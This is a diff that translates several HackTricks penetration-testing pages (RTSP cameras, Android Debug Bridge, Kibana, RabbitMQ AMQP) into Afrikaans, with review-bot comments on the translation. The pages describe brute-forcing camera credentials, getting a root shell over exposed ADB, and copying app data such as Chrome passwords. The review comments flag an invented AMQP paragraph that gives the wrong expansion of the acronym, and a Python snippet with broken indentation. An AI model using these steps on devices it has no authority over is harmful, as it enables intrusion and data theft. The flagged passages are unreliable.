@@ -56,51 +53,48 @@ s.sendall(req) data = s.recv(1024) print(data) ``` +**Basiese verifikasie** is eenvoudiger en verkieslik. **Digest-verifikasie** vereis sorgvuldige hantering van die verifikasiebesonderhede wat verskaf word in die "401 Onbevoegde" antwoord. -**Basic authentication** is simpler and preferred. **Digest authentication** requires careful handling of the authentication details provided in the "401 Unauthorized" response. - -This overview simplifies the process of accessing RTSP streams, focusing on **Basic authentication** for its simplicity and practicality in initial attempts. +Hierdie oorsig vereenvoudig die proses om toegang tot RTSP-strome te verkry, met die klem op **Basiese verifikasie** vanweë sy eenvoudigheid en praktiese aard in aanvanklike pogings. -## Enumeration - -Lets get information about valid methods and URLs are supported and try to brute-force the access (if needed) to get access to the content. +## Opname +Kry inligting oor geldige metodes en URL's wat ondersteun word en probeer toegang (indien nodig) met geweld verkry om toegang tot die inhoud te verkry. ```bash nmap -sV --script "rtsp-*" -p ``` - ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#rtsp) -### **Other useful programs** +### **Ander nuttige programme** -To bruteforce: [https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp\_authgrinder) +Om te brute force: [https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp\_authgrinder) [**Cameradar**](https://github.com/Ullaakut/cameradar) -* Detect open RTSP hosts on any accessible target -* Get their public info (hostname, port, camera model, etc.) 
-* Launch automated dictionary attacks to get their stream route (for example /live.sdp) -* Launch automated dictionary attacks to get the username and password of the cameras -* Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content -* Try to create a Gstreamer pipeline to check if they are properly encoded -* Print a summary of all the informations Cameradar could get +* Identifiseer oop RTSP-gashere op enige toeganklike teiken +* Kry hul openbare inligting (gasheernaam, poort, kamera-model, ens.) +* Lanceer outomatiese woordeboekaanvalle om hul stroomroete te kry (byvoorbeeld /live.sdp) +* Lanceer outomatiese woordeboekaanvalle om die gebruikersnaam en wagwoord van die kameras te kry +* Skep duimnaelskets van hulle om te kyk of die strome geldig is en 'n vinnige voorskou van hul inhoud te hê +* Probeer om 'n Gstreamer-pyplyn te skep om te kyk of hulle behoorlik gekodeer is +* Druk 'n opsomming van al die inligting wat Cameradar kon kry -## References +## Verwysings * [https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol) * [http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
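Review bot: the HTTP-style status line is translated in `die verifikasiebesonderhede wat verskaf word in die "401 Onbevoegde" antwoord`; the server sends the literal `401 Unauthorized`, and the preceding hunk keeps it in English, so keep it untranslated here too. The heading `## Opname` is a mistranslation of "Enumeration" ("opname" is a recording or survey); "Enumerasie" keeps the term readers of the other pages will recognise. Minor: the blank lines around the nmap fence (`nmap -sV --script "rtsp-*" -p`) were removed on both sides; keep them for consistency with the English page.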
diff --git a/network-services-pentesting/5555-android-debug-bridge.md b/network-services-pentesting/5555-android-debug-bridge.md index 0b6cfcfbe..566c95a62 100644 --- a/network-services-pentesting/5555-android-debug-bridge.md +++ b/network-services-pentesting/5555-android-debug-bridge.md @@ -2,59 +2,53 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -From [the docs](https://developer.android.com/studio/command-line/adb): +Vanaf [die dokumentasie](https://developer.android.com/studio/command-line/adb): -**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. - -**Default port**: 5555. +**Android Debug Bridge** (adb) is 'n veelsydige opdraglynhulpmiddel wat jou in staat stel om met 'n toestel te kommunikeer. Die adb-opdrag fasiliteer 'n verskeidenheid toestelaksies, soos die **installeer en foutopsporing van programme**, en dit bied **toegang tot 'n Unix-skil** wat jy kan gebruik om 'n verskeidenheid opdragte op 'n toestel uit te voer. +**Verstekpoort**: 5555. ``` PORT STATE SERVICE VERSION 5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909) ``` +## Koppel -## Connect - -If find the ADB service running in a port of a device and you can connect to it, **you can get a shell inside the system:** - +As jy die ADB-diens vind wat op 'n poort van 'n toestel loop en jy kan daarmee koppel, **kan jy 'n skulp binne die stelsel kry:** ```bash adb connect 10.10.10.10 adb root # Try to escalate to root adb shell ``` - -For more ADB commands check the following page: +Vir meer ADB-opdragte, kyk na die volgende bladsy: {% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} [adb-commands.md](../mobile-pentesting/android-app-pentesting/adb-commands.md) {% endcontent-ref %} -### Dump App data - -In order to completely download the data of an application you can: +### Stort App-data +Om die data van 'n toepassing heeltemal af te laai, kan jy die volgende doen: ```bash # From a root console chmod 777 /data/data/com.package cp -r /data/data/com.package /sdcard Note: Using ADB 
attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data. adb pull "/sdcard/com.package" ``` - -You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274). +Jy kan hierdie truuk gebruik om **sensitiewe inligting soos Chrome-wagwoorde** te herwin. Vir meer inligting hieroor, kyk na die inligting en verwysings wat [**hier**](https://github.com/carlospolop/hacktricks/issues/274) verskaf word. ## Shodan @@ -62,14 +56,14 @@ You can use this trick to **retrieve sensitive information like chrome passwords
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
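Review bot: the heading `### Stort App-data` reads as "pour/tip app data"; "dump" in the ADB sense is better rendered as "Onttrek App-data", or left as "Dump" as the English term. In the first hunk the blank lines that separated `**Verstekpoort**: 5555.` from the port listing fence, and `## Koppel` and the `{% content-ref %}` block from their neighbours, were removed; the English original keeps a blank line on each side of fences and GitBook directives, so preserve them. Not part of this change but visible in the context lines: `Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package".` sits inside the bash block without a `#`, so the block fails if pasted as-is; worth a `#` prefix in a follow-up.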
diff --git a/network-services-pentesting/5601-pentesting-kibana.md b/network-services-pentesting/5601-pentesting-kibana.md index aab2716cd..d9c1d6067 100644 --- a/network-services-pentesting/5601-pentesting-kibana.md +++ b/network-services-pentesting/5601-pentesting-kibana.md @@ -1,57 +1,53 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# Basic Information +# Basiese Inligting -Kibana is known for its ability to search and visualize data within Elasticsearch, typically running on port **5601**. It serves as the interface for the Elastic Stack cluster's monitoring, management, and security functions. +Kibana is bekend vir sy vermoë om data binne Elasticsearch te soek en te visualiseer, tipies op poort **5601**. Dit dien as die koppelvlak vir die monitering, bestuur en sekuriteitsfunksies van die Elastic Stack-klasters. -## Understanding Authentication +## Begrip van Verifikasie -The process of authentication in Kibana is inherently linked to the **credentials used in Elasticsearch**. If Elasticsearch has authentication disabled, Kibana can be accessed without any credentials. Conversely, if Elasticsearch is secured with credentials, the same credentials are required to access Kibana, maintaining identical user permissions across both platforms. Credentials might be found in the **/etc/kibana/kibana.yml** file. If these credentials do not pertain to the **kibana_system** user, they may offer broader access rights, as the kibana_system user's access is restricted to monitoring APIs and the .kibana index. +Die verifikasieproses in Kibana is inherent gekoppel aan die **legitimasie wat in Elasticsearch gebruik word**. As Elasticsearch verifikasie gedeaktiveer het, kan Kibana sonder enige legitimasie benader word. Omgekeerd, as Elasticsearch beveilig is met legitimasie, is dieselfde legitimasie nodig om Kibana te benader, met behoud van identiese gebruikersregte oor beide platforms. Legitimasie kan gevind word in die **/etc/kibana/kibana.yml**-lêer. As hierdie legitimasie nie betrekking het op die **kibana_system**-gebruiker nie, kan dit wyer toegangsregte bied, aangesien die toegang van die kibana_system-gebruiker beperk is tot monitering-API's en die .kibana-indeks. 
-## Actions Upon Access +## Aksies na Toegang -Once access to Kibana is secured, several actions are advisable: +Sodra toegang tot Kibana verseker is, word verskeie aksies aanbeveel: -- Exploring data from Elasticsearch should be a priority. -- The ability to manage users, including the editing, deletion, or creation of new users, roles, or API keys, is found under Stack Management -> Users/Roles/API Keys. -- It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)). +- Die verkenning van data uit Elasticsearch moet 'n prioriteit wees. +- Die vermoë om gebruikers te bestuur, insluitend die wysiging, verwydering of skepping van nuwe gebruikers, rolle of API-sleutels, word gevind onder Stack Bestuur -> Gebruikers/Rolle/API-sleutels. +- Dit is belangrik om die geïnstalleerde weergawe van Kibana vir bekende kwesbaarhede te kontroleer, soos die RCE-kwesbaarheid wat geïdentifiseer is in weergawes voor 6.6.0 ([Meer Inligting](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)). -## SSL/TLS Considerations +## SSL/TLS-oorwegings -In instances where SSL/TLS is not enabled, the potential for leaking sensitive information should be thoroughly evaluated.s +In gevalle waar SSL/TLS nie geaktiveer is nie, moet die potensiaal vir die lek van sensitiewe inligting deeglik geëvalueer word. -## References +## Verwysings * [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
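Review bot: the Kibana navigation path was translated in `word gevind onder Stack Bestuur -> Gebruikers/Rolle/API-sleutels`; those are menu labels of the Kibana interface, so keep them verbatim as `Stack Management -> Users/Roles/API Keys`, the same way `kibana_system` and `/etc/kibana/kibana.yml` were kept. The term for "credentials" is inconsistent across the patch: this hunk uses "legitimasie" throughout while the RTSP page uses "geloofsbriewe"; pick one for the whole translation. `Elastic Stack-klasters` pluralises the original's single cluster. Dropping the stray `.s` at the end of the SSL/TLS paragraph is a good fix.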
- - diff --git a/network-services-pentesting/5671-5672-pentesting-amqp.md b/network-services-pentesting/5671-5672-pentesting-amqp.md index a31a0c8b0..8d974184d 100644 --- a/network-services-pentesting/5671-5672-pentesting-amqp.md +++ b/network-services-pentesting/5671-5672-pentesting-amqp.md @@ -2,55 +2,63 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -From [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html): +Van [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html): -> **RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\ -> A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.\ -Definition from . - -**Default port**: 5672,5671 +> **RabbitMQ** is 'n **boodskap-ry-software** wat ook bekend staan as 'n _boodskapmakelaar_ of _rybestuurder_. Eenvoudig gestel; dit is sagteware waar rykies gedefinieer word, waaraan aansoeke koppel om 'n boodskap of boodskappe oor te dra.\ +> 'n **Boodskap kan enige soort inligting insluit**. Dit kan byvoorbeeld inligting hê oor 'n proses of taak wat op 'n ander aansoek moet begin (wat selfs op 'n ander bediener kan wees), of dit kan net 'n eenvoudige teksboodskap wees. Die rybestuurdersagteware stoor die boodskappe totdat 'n ontvangende aansoek koppel en 'n boodskap van die ry afhaal. Die ontvangende aansoek verwerk dan die boodskap.\ +Definisie van . 
+**Verstekpoort**: 5672,5671 ``` PORT STATE SERVICE VERSION 5672/tcp open amqp RabbitMQ 3.1.5 (0-9) ``` +## Opstel -## Enumeration - -### Manual - +### Handleiding ```python import amqp #By default it uses default credentials "guest":"guest" conn = amqp.connection.Connection(host="", port=5672, virtual_host="/") conn.connect() for k, v in conn.server_properties.items(): - print(k, v) +print(k, v) ``` +### Outomaties -### Automatic +AMQP (Asynchronous Messaging and Queueing Protocol) is 'n protokol wat gebruik word vir die kommunikasie tussen toepassings wat boodskappe uitruil. Dit is 'n protokol wat dikwels gebruik word in stelsels wat boodskappe-gebaseerde kommunikasie benodig, soos boodskap-gebaseerde ry-gebaseerde stelsels. +AMQP maak gebruik van 'n klient-bedieningsmodel, waar die klient die boodskap stuur en die bediener die boodskap ontvang en verwerk. Dit maak gebruik van 'n stelsel van uitruilings en ryë om die boodskappe tussen toepassings te roeteer. + +Tydens 'n pentest kan jy AMQP gebruik om te kyk vir moontlike kwesbaarhede en om toegang tot die stelsel te verkry. Hier is 'n paar tegnieke wat jy kan gebruik: + +- **Portskandering**: Skandeer die poorte 5671 en 5672 om te kyk of die AMQP-diens beskikbaar is. +- **Identifiseer die AMQP-bedieners**: Identifiseer die bedieners wat AMQP gebruik deur na spesifieke kenmerke in die antwoord te soek. +- **Verken die AMQP-stelsel**: Gebruik gereedskap soos RabbitMQ Management UI om die AMQP-stelsel te verken en inligting oor die uitruilings, ryë en boodskappe te verkry. +- **Aanvalle op die AMQP-stelsel**: Voer aanvalle uit soos die stuur van valse boodskappe, die oorbelasting van die bediener met 'n groot aantal boodskappe, of die manipulasie van die boodskappe om ongewenste aksies te veroorsaak. + +Dit is belangrik om te onthou dat jy toestemming moet hê om AMQP te pentest en dat jy die nodige etiese hacking-praktyke moet volg. 
```bash nmap -sV -Pn -n -T4 -p 5672 --script amqp-info PORT STATE SERVICE VERSION 5672/tcp open amqp RabbitMQ 3.1.5 (0-9) -| amqp-info: -| capabilities: +| amqp-info: +| capabilities: | publisher_confirms: YES | exchange_exchange_bindings: YES | basic.nack: YES 
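Review bot: content was invented rather than translated under `### Outomaties`: the five paragraphs from `AMQP (Asynchronous Messaging and Queueing Protocol) is 'n protokol ...` through `Dit is belangrik om te onthou dat jy toestemming moet hê om AMQP te pentest ...` have no counterpart in the English source, and the expansion is also wrong (AMQP is the Advanced Message Queuing Protocol). A translation PR should not add content; drop the block so `### Outomaties` is followed directly by the nmap command, as in the original. Second, the Python example is broken by `-    print(k, v)` / `+print(k, v)`: the call is the body of the `for` loop and stripping its indentation raises an IndentationError; restore the four spaces. Third, two headings are mistranslated: `## Opstel` means "set up/compose" rather than "Enumeration" ("Enumerasie"), and `### Handleiding` is "manual" as in a handbook, where "Handmatig" is meant.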
@@ -63,26 +71,25 @@ PORT STATE SERVICE VERSION | mechanisms: PLAIN AMQPLAIN |_ locales: en_US ``` - ### Brute Force -* [**AMQP Protocol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#amqp-activemq-rabbitmq-qpid-joram-and-solace) -* [**STOMP Protocol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#stomp-activemq-rabbitmq-hornetq-and-openmq) +* [**AMQP-protokol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#amqp-activemq-rabbitmq-qpid-joram-and-solace) +* [**STOMP-protokol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#stomp-activemq-rabbitmq-hornetq-and-openmq) -## Other RabbitMQ ports +## Ander RabbitMQ-poorte -In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**: +In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) kan jy vind dat **rabbitmq verskeie poorte gebruik**: -* **1883, 8883**: ([MQTT clients](http://mqtt.org) without and with TLS, if the [MQTT plugin](https://www.rabbitmq.com/mqtt.html) is enabled. [**Learn more about how to pentest MQTT here**](1883-pentesting-mqtt-mosquitto.md). -* **4369: epmd**, a peer discovery service used by RabbitMQ nodes and CLI tools. [**Learn more about how to pentest this service here**](4369-pentesting-erlang-port-mapper-daemon-epmd.md). -* **5672, 5671**: used by AMQP 0-9-1 and 1.0 clients without and with TLS -* **15672**: [HTTP API](https://www.rabbitmq.com/management.html) clients, [management UI](https://www.rabbitmq.com/management.html) and [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) (only if the [management plugin](https://www.rabbitmq.com/management.html) is enabled). [**Learn more about how to pentest this service here**](15672-pentesting-rabbitmq-management.md). 
-* 15674: STOMP-over-WebSockets clients (only if the [Web STOMP plugin](https://www.rabbitmq.com/web-stomp.html) is enabled) -* 15675: MQTT-over-WebSockets clients (only if the [Web MQTT plugin](https://www.rabbitmq.com/web-mqtt.html) is enabled) -* 15692: Prometheus metrics (only if the [Prometheus plugin](https://www.rabbitmq.com/prometheus.html) is enabled) -* 25672: used for inter-node and CLI tools communication (Erlang distribution server port) and is allocated from a dynamic range (limited to a single port by default, computed as AMQP port + 20000). Unless external connections on these ports are really necessary (e.g. the cluster uses [federation](https://www.rabbitmq.com/federation.html) or CLI tools are used on machines outside the subnet), these ports should not be publicly exposed. See [networking guide](https://www.rabbitmq.com/networking.html) for details. **Only 9 of these ports opened on the internet**. -* 35672-35682: used by CLI tools (Erlang distribution client ports) for communication with nodes and is allocated from a dynamic range (computed as server distribution port + 10000 through server distribution port + 10010). See [networking guide](https://www.rabbitmq.com/networking.html) for details. -* 61613, 61614: [STOMP clients](https://stomp.github.io/stomp-specification-1.2.html) without and with TLS (only if the [STOMP plugin](https://www.rabbitmq.com/stomp.html) is enabled). Less than 10 devices with this port open and mostly UDP for DHT nodes. +* **1883, 8883**: ([MQTT-kliënte](http://mqtt.org) sonder en met TLS, as die [MQTT-invoegtoepassing](https://www.rabbitmq.com/mqtt.html) geaktiveer is. [**Leer meer oor hoe om MQTT te pentest hier**](1883-pentesting-mqtt-mosquitto.md). +* **4369: epmd**, 'n peer-ontdekkingsdiens wat deur RabbitMQ-nodes en CLI-hulpmiddels gebruik word. [**Leer meer oor hoe om hierdie diens te pentest hier**](4369-pentesting-erlang-port-mapper-daemon-epmd.md). 
+* **5672, 5671**: gebruik deur AMQP 0-9-1 en 1.0-kliënte sonder en met TLS +* **15672**: [HTTP API](https://www.rabbitmq.com/management.html)-kliënte, [bestuurskoppelvlak](https://www.rabbitmq.com/management.html) en [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) (slegs as die [bestuursinvoegtoepassing](https://www.rabbitmq.com/management.html) geaktiveer is). [**Leer meer oor hoe om hierdie diens te pentest hier**](15672-pentesting-rabbitmq-management.md). +* 15674: STOMP-oor-WebSockets-kliënte (slegs as die [Web STOMP-invoegtoepassing](https://www.rabbitmq.com/web-stomp.html) geaktiveer is) +* 15675: MQTT-oor-WebSockets-kliënte (slegs as die [Web MQTT-invoegtoepassing](https://www.rabbitmq.com/web-mqtt.html) geaktiveer is) +* 15692: Prometheus-metriek (slegs as die [Prometheus-invoegtoepassing](https://www.rabbitmq.com/prometheus.html) geaktiveer is) +* 25672: gebruik vir inter-node en CLI-hulpmiddelkommunikasie (Erlang-verspreidingsbedienerpoort) en word toegewys uit 'n dinamiese reeks (beperk tot 'n enkele poort standaard, bereken as AMQP-poort + 20000). Tensy eksterne verbindinge op hierdie poorte werklik nodig is (bv. die groep maak gebruik van [federasie](https://www.rabbitmq.com/federation.html) of CLI-hulpmiddels word op masjiene buite die subnet gebruik), moet hierdie poorte nie openlik blootgestel word nie. Sien [netwerkgids](https://www.rabbitmq.com/networking.html) vir meer besonderhede. **Slegs 9 van hierdie poorte is oop op die internet**. +* 35672-35682: gebruik deur CLI-hulpmiddels 